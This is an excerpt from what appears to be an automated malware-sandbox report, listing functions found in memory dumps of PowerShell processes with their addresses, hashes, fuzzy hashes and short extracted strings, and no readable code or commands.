                                                    • Instruction ID: 9a996b56ab8a8d94a39795430d2ed2302d57d2d275b5a67c5d8c99d6d422e70f
                                                    • Opcode Fuzzy Hash: 24be52564693d6a883793751d84cc17e50e13051b38105c91c356ba4fb1aa4ef
                                                    • Instruction Fuzzy Hash: 4C61F72190E7C54FD762AB6898506A57FF1FF56250B0D41FBD489CB0E3CA19AC09C392
                                                    Function 00007FF886DDA716 Relevance: .2, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a23b1a247f60ae56c90b58ddd8c509b3dcff7678165876aca2cf4c9499acefb
                                                    • Instruction ID: 24147f7b93b23bd18c918ab46bcdd4a30c416e9a4a3f0ecef1e9837e9b4a2cc2
                                                    • Opcode Fuzzy Hash: 0a23b1a247f60ae56c90b58ddd8c509b3dcff7678165876aca2cf4c9499acefb
                                                    • Instruction Fuzzy Hash: A551F232E0CB854FE755EA6898552B8BBE1FF56360F0841BAC04E871D3DE296C46C742
                                                    Function 00007FF886DDA72C Relevance: .2, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11a816bd8cfa5ddf75545de4efa6c52c2eab1ead1f253613b75bba4b016a9b24
                                                    • Instruction ID: bea5a35c43190ed6c0488b5d2acb7e023c25068bdf39375b038f76197310f81d
                                                    • Opcode Fuzzy Hash: 11a816bd8cfa5ddf75545de4efa6c52c2eab1ead1f253613b75bba4b016a9b24
                                                    • Instruction Fuzzy Hash: 8751F132E0DBC54FE759EA6898552B8BBE1FF56760F0841BEC04E87183DE296C46C742
                                                    Function 00007FF886DD9F16 Relevance: .2, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0462896770d9315727b44f0df2493023883dbbfacfc51a542a01e7d1012f66eb
                                                    • Instruction ID: 9e24e85219be070b50aea3212dd6ce5950543d66d64f1c7e3ea00715b31209a1
                                                    • Opcode Fuzzy Hash: 0462896770d9315727b44f0df2493023883dbbfacfc51a542a01e7d1012f66eb
                                                    • Instruction Fuzzy Hash: C651F332E0DB854FE755EA6888552B8BBE1FF55790F1801FED04E87183DE2AAC49C742
                                                    Function 00007FF886DD92A6 Relevance: .2, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f86c0cb3561815746fc4ada29973b46ce96d1872f81cb0bf134995a301f59d18
                                                    • Instruction ID: 820548788487edcc289a86c5ed5c5597fd7427cc393c3855fa8abfc4173ddd27
                                                    • Opcode Fuzzy Hash: f86c0cb3561815746fc4ada29973b46ce96d1872f81cb0bf134995a301f59d18
                                                    • Instruction Fuzzy Hash: FD510132E0DB854FE755EB6888552B8BBE1FF55660F1801FEC04E8B1D3CA2AAC45C302
                                                    Function 00007FF886DD99F0 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f7b15becc451803b6abe19d2909acfbe21814899fe0c0ec6bbdf5f7d152829f8
                                                    • Instruction ID: 2b5800024cf795190c4997daf2b90e15464b053aadbc5ea00d414b8270cbf1a0
                                                    • Opcode Fuzzy Hash: f7b15becc451803b6abe19d2909acfbe21814899fe0c0ec6bbdf5f7d152829f8
                                                    • Instruction Fuzzy Hash: D441D422D0DBC94FE756EA6848945757FE0FF56250B0901FAD08ECF1A3CA1A6C09C352
                                                    Function 00007FF886DD5382 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe7100602b70c79a5946860bbf7a80ce51e995548fb852f34fb0648dcc279cef
                                                    • Instruction ID: 9704f508c41effe6ddada5d989c0a8b78b1228bd34c3e8f07253d9f13ce12d45
                                                    • Opcode Fuzzy Hash: fe7100602b70c79a5946860bbf7a80ce51e995548fb852f34fb0648dcc279cef
                                                    • Instruction Fuzzy Hash: 2631E622D1FA864BF3A6A66818512B866D1FF496A1B5802BAD40FC71D3ED4E6C148343
                                                    Function 00007FF886DD4354 Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea88bfb63bd95f73b93cb602d800e1caed0ce620d128a5af57f22cd0903b1936
                                                    • Instruction ID: cfb4e0a35b7c7779b33e144c46e767f14c950873c28ca60411ec6ff912dc9f60
                                                    • Opcode Fuzzy Hash: ea88bfb63bd95f73b93cb602d800e1caed0ce620d128a5af57f22cd0903b1936
                                                    • Instruction Fuzzy Hash: 7021E622E5DA864BF3E5BB2C585527466D2FF956A0F9801BAC00EC31D3ED1AEC05C342
                                                    Function 00007FF886D0AFE4 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86c5a9c7931671357ff0888914de732dbfee76d7e6b78eeea218e8b48f6d615c
                                                    • Instruction ID: aeaffc421c09b148e3dfc9c05fd3d4222d52eb8d3670e754022689ee94e2598a
                                                    • Opcode Fuzzy Hash: 86c5a9c7931671357ff0888914de732dbfee76d7e6b78eeea218e8b48f6d615c
                                                    • Instruction Fuzzy Hash: 25311A3081D64E8EFBB49F29CD0ABF93291FF42359F400139D81E86192DA7A6D85CF52
                                                    Function 00007FF886DD121F Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: babf624c9e4586e7a7e017eab8001b448f6b6905b0e90f3ff5ccf3a7325c8fc8
                                                    • Instruction ID: 18b5cab708f5ffbdd888634590668fb6b1b73fc44a07f9c8af6a517ca42cff5f
                                                    • Opcode Fuzzy Hash: babf624c9e4586e7a7e017eab8001b448f6b6905b0e90f3ff5ccf3a7325c8fc8
                                                    • Instruction Fuzzy Hash: 70218E62D0E6C58FF3A5A6381C961786EE1EFA7694B0911FEC05EC71D3D81E5C098352
                                                    Function 00007FF886DD8F4B Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de875f2b507a6d7c78a84c6d11f68e19f74401591824635c5d56cd0adddc14a9
                                                    • Instruction ID: dd9cb89c82a148aac87ccc1733d0ac44262c3d64941c1c95a48afe5a46d40c84
                                                    • Opcode Fuzzy Hash: de875f2b507a6d7c78a84c6d11f68e19f74401591824635c5d56cd0adddc14a9
                                                    • Instruction Fuzzy Hash: 0F11E021D4EA864FE3A2FA7848519656BD2AF1579070841FAC08ECF1D3D829AC04C382
                                                    Function 00007FF886D03945 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction ID: 94a9d593544972210b1c985df1f6581904c04c57d9f4c7b26d81c62bd8d7428f
                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction Fuzzy Hash: 3A01A73111CB0C4FD748EF0CE051AA5B3E0FB89360F10052DE58AC3651DB36E881CB42
                                                    Function 00007FF886DD896A Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58c03ef0a2fda758320412609891d320283d2656fd1f900208e601c8e6ce0dc0
                                                    • Instruction ID: 3cc32ab9fd08b652a996c93ec16793279269f3258298ec223aee962f5f5c697f
                                                    • Opcode Fuzzy Hash: 58c03ef0a2fda758320412609891d320283d2656fd1f900208e601c8e6ce0dc0
                                                    • Instruction Fuzzy Hash: ABF0E532A1C90D0AA386A26C64052F9B3E2EFC4135B855177C14EC3142ED15D8164341
                                                    Function 00007FF886DD8D29 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8408900cdfd657b047f5746ba208c6e475643682739f89e9c89a64fbb2118c4e
                                                    • Instruction ID: 1f2480b502f07548a6e71f15540cb33f9e9a01836cfc887ef63ddce164ffce9f
                                                    • Opcode Fuzzy Hash: 8408900cdfd657b047f5746ba208c6e475643682739f89e9c89a64fbb2118c4e
                                                    • Instruction Fuzzy Hash: 5BE0D832F1DA050EF74B655C28121F87391EFD0170744443FC10FC2083DC1AE8124345

                                                    Executed Functions

                                                    Function 0474E6A8 Relevance: .3, Instructions: 281COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5af4fa3575362841aeea6313b19c9022384ba67ae39472bdd394e8bd41e3cd29
                                                    • Instruction ID: 4119757fa9813f4edf33bbd4a04f28f6e9c1eec220142b9f700f7477c1b5f3a3
                                                    • Opcode Fuzzy Hash: 5af4fa3575362841aeea6313b19c9022384ba67ae39472bdd394e8bd41e3cd29
                                                    • Instruction Fuzzy Hash: 9CB12F70E00209DFDF14CFA9D8857ADBBF6BF88724F148529D815A7394EB74A845CB81
                                                    Function 0474EF78 Relevance: .3, Instructions: 266COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edd0b26884a8e4e7c12402021b73759b7e6b1032b271b3630d694484be148bd0
                                                    • Instruction ID: d47f39dc497842e9a23c86aae693ee4e83a235bb4ce2b9d9ef1dd4529067649f
                                                    • Opcode Fuzzy Hash: edd0b26884a8e4e7c12402021b73759b7e6b1032b271b3630d694484be148bd0
                                                    • Instruction Fuzzy Hash: D1B14D71E00209CFDB10CFA9D9857AEBBF2AFC8714F148529D815EB394EB75A845CB81
                                                    Function 07435CF0 Relevance: 13.5, Strings: 10, Instructions: 1033COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml$(fml$(fml$(fml$(fml$x.^k$-^k
                                                    • API String ID: 0-288908001
                                                    • Opcode ID: 6882567b691443b9af6b3830513485b10289d37413d76e1a6faddbdef909bfcb
                                                    • Instruction ID: c6977f1cc448e9c12d91dd6de7aa285a5def92e1d47148863cb120a207be9907
                                                    • Opcode Fuzzy Hash: 6882567b691443b9af6b3830513485b10289d37413d76e1a6faddbdef909bfcb
                                                    • Instruction Fuzzy Hash: A78294B0B00215DFEB24DBA4C850BAEB7B2AF89300F15856AD549AF351DB75EC41CF91
                                                    Function 07436703 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$x.^k$x.^k$-^k
                                                    • API String ID: 0-1570985860
                                                    • Opcode ID: c6e80526b09ecd5d8aae724c1f9156ec8489c2b1710221f1287f3f20683d095e
                                                    • Instruction ID: 8c048d26519715abec8f59235359ab02ff06089536f6813dd2ee1c1fddb2c887
                                                    • Opcode Fuzzy Hash: c6e80526b09ecd5d8aae724c1f9156ec8489c2b1710221f1287f3f20683d095e
                                                    • Instruction Fuzzy Hash: 1CF182B0A002169FE724EB68C850BAAB7B3BF88304F1584A6D5096F791DB75ED818F51
                                                    Function 074358E8 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml$x.^k
                                                    • API String ID: 0-4174471076
                                                    • Opcode ID: ac80885fd531c1e126d5748cfecad74e1f5eba549a3d3fe40368294c4b41efe5
                                                    • Instruction ID: cd4722cc6b7df6c1ecac01a58d6ff2c4d4112620eeb86ce9dfbd1520fea25292
                                                    • Opcode Fuzzy Hash: ac80885fd531c1e126d5748cfecad74e1f5eba549a3d3fe40368294c4b41efe5
                                                    • Instruction Fuzzy Hash: E7B1ACB0B102059FE714EBA8C490BAEF7F3AF89304F15842AE5096F751CB76EC518B65
                                                    Function 07434078 Relevance: 5.7, Strings: 4, Instructions: 742COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml
                                                    • API String ID: 0-679830726
                                                    • Opcode ID: 7ba284737c1f0e72f40357015c1273e5cd23537a800e8e7b4b64d0b29957371b
                                                    • Instruction ID: 4da0b5fdf7dd7313a6a45f99184b32ddb5ba9f3265326b3134a43479ca2380a1
                                                    • Opcode Fuzzy Hash: 7ba284737c1f0e72f40357015c1273e5cd23537a800e8e7b4b64d0b29957371b
                                                    • Instruction Fuzzy Hash: 52625DB4B00244DFE714CB98C944BEEB7B2AF89314F15C56AD909AB351DB72EC42CB91
                                                    Function 074358D3 Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$x.^k
                                                    • API String ID: 0-3350075853
                                                    • Opcode ID: 3300faf89aa9ded80571adf1d18dbe764dfe17dc6e0f230941706c5bc902fb32
                                                    • Instruction ID: 3052c1b03ffad89f1936bbd4388ad3e4c8a40f8cb922dc9da876cc2c930d6ac8
                                                    • Opcode Fuzzy Hash: 3300faf89aa9ded80571adf1d18dbe764dfe17dc6e0f230941706c5bc902fb32
                                                    • Instruction Fuzzy Hash: 9EA19FB0A102059FE714EBA8C490BEEF7F2AF89304F15846AD5096B351CB76EC91CB65
                                                    Function 07434058 Relevance: 3.2, Strings: 2, Instructions: 663COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml
                                                    • API String ID: 0-3577347635
                                                    • Opcode ID: f7ca68364c97d16d9943b5587c2a963b054a5c8d504d5660021a1b92010c195a
                                                    • Instruction ID: 7157d386f57d265b37943ed2f30454203c78a1fcbc559d189380025262b0fc39
                                                    • Opcode Fuzzy Hash: f7ca68364c97d16d9943b5587c2a963b054a5c8d504d5660021a1b92010c195a
                                                    • Instruction Fuzzy Hash: C2525DB4B00245DFDB14CB98C944BEABBB2AF89314F15C56AD9096B351C776EC82CF81
                                                    Function 074327A0 Relevance: 3.1, Strings: 2, Instructions: 626COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 84kl$84kl
                                                    • API String ID: 0-1683060484
                                                    • Opcode ID: c38097bba32174eb611d2b3ff8ac1fa0716f103c33f9fb8332812b61b3faaf83
                                                    • Instruction ID: de7fa42cf7542533ae1862d4efc901ba05dc3837bcce4e3fab2fd23cd8795eb4
                                                    • Opcode Fuzzy Hash: c38097bba32174eb611d2b3ff8ac1fa0716f103c33f9fb8332812b61b3faaf83
                                                    • Instruction Fuzzy Hash: F52213B1704316CFDB258B65C8007EBBBB1BF8A211F1884ABD459DB392DBB5D841C7A1
                                                    Function 07431020 Relevance: 2.9, Strings: 2, Instructions: 422COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml
                                                    • API String ID: 0-3577347635
                                                    • Opcode ID: b9b0980ccdbb99a4210eea3c322ded91a858985ffdef434736303964e1601883
                                                    • Instruction ID: 641cda5283fff49e33f186cb72facdc239abf7e8eb9b8259b8060718c1c2daa9
                                                    • Opcode Fuzzy Hash: b9b0980ccdbb99a4210eea3c322ded91a858985ffdef434736303964e1601883
                                                    • Instruction Fuzzy Hash: 00F14AB0B00609DFDB14CF98C540BAAB7F2AF89714F15C06AD9099F755DB72EC428B91
                                                    Function 074377D0 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.^k$-^k
                                                    • API String ID: 0-641841107
                                                    • Opcode ID: 606f875a3a08ee395c85150fc7d4bb376c7ce40e1f6d90e17eaf3fb06c72e11a
                                                    • Instruction ID: b2da7202e5564ba69f9e884f03ef8fca708dedad26a969c2f048a2a2566cf426
                                                    • Opcode Fuzzy Hash: 606f875a3a08ee395c85150fc7d4bb376c7ce40e1f6d90e17eaf3fb06c72e11a
                                                    • Instruction Fuzzy Hash: 2CD1A3B0B00205DFEB15DBA8C490BAEB7B3AF88304F15C52AD5496F355DB75EC428B91
                                                    Function 074377B2 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.^k$-^k
                                                    • API String ID: 0-641841107
                                                    • Opcode ID: c86e0bb4c752033c5d2eda7e858d98325c6a55bad87cac6c81c77f74b7d19bc7
                                                    • Instruction ID: b65e51dbde253e5ef733740196a92e654917024bb6c241f94867cbd88940fc4a
                                                    • Opcode Fuzzy Hash: c86e0bb4c752033c5d2eda7e858d98325c6a55bad87cac6c81c77f74b7d19bc7
                                                    • Instruction Fuzzy Hash: DCB1AFF0A00205DFDB15DBA8C480BAEBBB2AF88314F15C55AD5486F355DB75EC82CB91
                                                    Function 07431000 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml
                                                    • API String ID: 0-2630866886
                                                    • Opcode ID: 59d8db4e406c1243d043c8fd3b251351c7eef487f66b7a3b7df255bad84912dc
                                                    • Instruction ID: b21fef16d2bc897ba160d335a59ccbd73f12b9b89b0ca7421344ff741d519122
                                                    • Opcode Fuzzy Hash: 59d8db4e406c1243d043c8fd3b251351c7eef487f66b7a3b7df255bad84912dc
                                                    • Instruction Fuzzy Hash: BDF15EB4A00609DFDB10CF98C540AAABBF2BF89714F19C06AD8199B755D772EC41CF91
                                                    Function 07431493 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: h2`k
                                                    • API String ID: 0-1201988217
                                                    • Opcode ID: 75e585fb751a00df46ec7b55eeba31a694af32d222ce7719de2a3d048d7bdabd
                                                    • Instruction ID: b897a64156bb2cf3750c0586c0f1ddc702f09d87f06cef4be008398cd1a9b270
                                                    • Opcode Fuzzy Hash: 75e585fb751a00df46ec7b55eeba31a694af32d222ce7719de2a3d048d7bdabd
                                                    • Instruction Fuzzy Hash: 4951D2F1B01605DFEB10CF5CC440BAAB7A2AF89354F15C46BE90A8B382D672DC42CB91
                                                    Function 07437BF6 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.^k
                                                    • API String ID: 0-1128592527
                                                    • Opcode ID: f385621d903ea64e7e1816e9f65db0201803b64c9ce475bb32b5f0beab896285
                                                    • Instruction ID: 4933d2d8e662c3105204a13579a0245df4b00d26f5e6aeb525045bd1a651095a
                                                    • Opcode Fuzzy Hash: f385621d903ea64e7e1816e9f65db0201803b64c9ce475bb32b5f0beab896285
                                                    • Instruction Fuzzy Hash: F3317370B40204ABF704A7A8C855BAFB7B3AFC9344F15C425E9056F391DEB6EC428B91
                                                    Function 07437DB0 Relevance: .7, Instructions: 702COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2ab5436c38d3e91384316cbf17a8137f82ae1be1ce193147962ce75fce560f7
                                                    • Instruction ID: 349388e202793918df6882c41f56f22849db091b730d77e346eb93500da28fae
                                                    • Opcode Fuzzy Hash: f2ab5436c38d3e91384316cbf17a8137f82ae1be1ce193147962ce75fce560f7
                                                    • Instruction Fuzzy Hash: 773203B1704206CFDB258BA8C8407EBFBE6AF89211F1584ABE54A9B341DB75DC41C7B1
                                                    Function 07439D78 Relevance: .6, Instructions: 589COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0365882a5b937a56c29fa3494b3394d78cbf0627115d504851010b7b19b6baa
                                                    • Instruction ID: 18b6ca0c55f39031702f3c769eaec0ab6e59563005bb4b389df7b7e3abc33a0d
                                                    • Opcode Fuzzy Hash: d0365882a5b937a56c29fa3494b3394d78cbf0627115d504851010b7b19b6baa
                                                    • Instruction Fuzzy Hash: 471226B17043058FDB149B6898017EBB7A29FC9214F14C47BE549DB391DB76EC82C7A1
                                                    Function 0474ABB0 Relevance: .5, Instructions: 519COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20e60d59877a34067810065ffaa4c147c9be8fceb639347edb762661cb526fc8
